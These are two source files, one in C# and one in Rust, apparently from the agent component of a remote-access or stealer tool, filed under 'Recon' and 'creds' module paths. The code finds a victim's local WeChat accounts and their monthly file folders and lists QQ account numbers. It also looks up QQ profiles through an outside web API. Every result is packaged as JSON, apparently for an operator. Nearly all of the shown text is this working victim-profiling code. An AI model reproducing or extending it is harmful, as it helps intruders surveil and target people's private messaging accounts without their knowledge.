File: src/agent/Modules/Recon/OtherSoftware.cs
using System.Collections.Concurrent;
using System.Text.RegularExpressions;

namespace LibraNextgen.Agent.Modules.Recon;

public static class OtherSoftware
{
    private static readonly ConcurrentDictionary<string, string> _qqInfoCache = new();

    private static readonly HttpClient _qqHttp = new()
    {
        Timeout = TimeSpan.FromSeconds(10)
    };
    public static string CollectWeChat()
    {
        try
        {
            var docs = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            var xwechatDir = Path.Combine(docs, "Tencent Files", "xwechat_files");
            if (!Directory.Exists(xwechatDir))
                return """{"accounts":[]}""";

            var accounts = new List<string>();
            foreach (var dir in Directory.GetDirectories(xwechatDir))
            {
                var name = Path.GetFileName(dir);
                if (!name.StartsWith("wxid_")) continue;

                var fileDir = Path.Combine(dir, "msg", "file");
                var monthDirs = new List<string>();
                if (Directory.Exists(fileDir))
                {
                    foreach (var sub in Directory.GetDirectories(fileDir))
                    {
                        var subName = Path.GetFileName(sub);
                        if (Regex.IsMatch(subName, @"^\d{4}-\d{2}$"))
                            monthDirs.Add(subName);
                    }
                    monthDirs.Sort();
                    monthDirs.Reverse(); // newest first
                }

                accounts.Add($$"""{"wxid":"{{Esc(name)}}","path":"{{Esc(dir)}}","fileDirs":[{{string.Join(",", monthDirs.Select(d => $"\"{Esc(d)}\""))}}]}""");
            }

            return $$"""{"accounts":[{{string.Join(",", accounts)}}]}""";
        }
        catch
        {
            return """{"accounts":[]}""";
        }
    }

    public static string CollectQQ()
    {
        try
        {
            var docs = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            var tencentDir = Path.Combine(docs, "Tencent Files");
            if (!Directory.Exists(tencentDir))
                return """{"accounts":[]}""";

            var accounts = new List<string>();
            foreach (var dir in Directory.GetDirectories(tencentDir))
            {
                var name = Path.GetFileName(dir);
                if (name.Length >= 5 && name.All(char.IsDigit))
                {
                    accounts.Add($$"""{"number":"{{Esc(name)}}","path":"{{Esc(dir)}}"}""");
                }
            }

            return $$"""{"accounts":[{{string.Join(",", accounts)}}]}""";
        }
        catch
        {
            return """{"accounts":[]}""";
        }
    }

    public static async Task<string> CollectQQInfoAsync(string qq)
    {
        // Return cached result if available
        if (_qqInfoCache.TryGetValue(qq, out var cached))
            return cached;

        try
        {
            var url = $"https://uapis.cn/api/v1/social/qq/userinfo?qq={qq}";
            var json = await _qqHttp.GetStringAsync(url);

            // Cache the raw JSON
            _qqInfoCache[qq] = json;
            return json;
        }
        catch (Exception ex)
        {
            return $$"""{"error":"{{Esc(ex.Message)}}"}""";
        }
    }

    private static string Esc(string s) => s.Replace("\\", "\\\\").Replace("\"", "\\\"");
}

File: src/agent-rs/modules/creds/src/other_software.rs
pub struct OtherSoftware;

impl OtherSoftware {
    pub fn collect_wechat() -> String {
        let docs = get_documents_dir();
        let xwechat_dir = format!("{}\\Tencent Files\\xwechat_files", docs);

        let dir = match std::fs::read_dir(&xwechat_dir) {
            Ok(d) => d,
            Err(_) => return r#"{"accounts":[]}"#.to_string(),
        };

        let mut accounts = Vec::new();
        for entry in dir.filter_map(|e| e.ok()) {
            let name = entry.file_name().to_string_lossy().to_string();
            if !name.starts_with("wxid_") {
                continue;
            }

            let file_dir = format!("{}\\msg\\file", entry.path().display());
            let mut month_dirs = Vec::new();
            if let Ok(sub_entries) = std::fs::read_dir(&file_dir) {
                for sub in sub_entries.filter_map(|e| e.ok()) {
                    let sub_name = sub.file_name().to_string_lossy().to_string();
                    if is_year_month(&sub_name) {
                        month_dirs.push(sub_name);
                    }
                }
                month_dirs.sort_by(|a, b| b.cmp(a)); // newest first
            }

            accounts.push(format!(
                r#"{{"wxid":"{}","path":"{}","fileDirs":[{}]}}"#,
                escape(&name),
                escape(&entry.path().to_string_lossy()),
                month_dirs.iter().map(|d| format!("\"{}\"", escape(d))).collect::<Vec<_>>().join(",")
            ));
        }

        format!(r#"{{"accounts":[{}]}}"#, accounts.join(","))
    }
}

fn get_documents_dir() -> String {
    #[cfg(target_os = "windows")]
    {
        std::env::var("USERPROFILE")
            .map(|p| format!("{}\\Documents", p))
            .unwrap_or_else(|_| "C:\\Users\\Default\\Documents".to_string())
    }
    #[cfg(not(target_os = "windows"))]
    {
        std::env::var("HOME").unwrap_or_else(|_| "/home".to_string())
    }
}

fn is_year_month(s: &str) -> bool {
    if s.len() != 7 {
        return false;
    }
    let parts: Vec<&str> = s.split('-').collect();
    if parts.len() != 2 {
        return false;
    }
    parts[0].len() == 4
        && parts[0].chars().all(|c| c.is_ascii_digit())
        && parts[1].len() == 2
        && parts[1].chars().all(|c| c.is_ascii_digit())
}

fn escape(s: &str) -> String {
    s.replace('\\', "\\\\").replace('"', "\\\"")
}
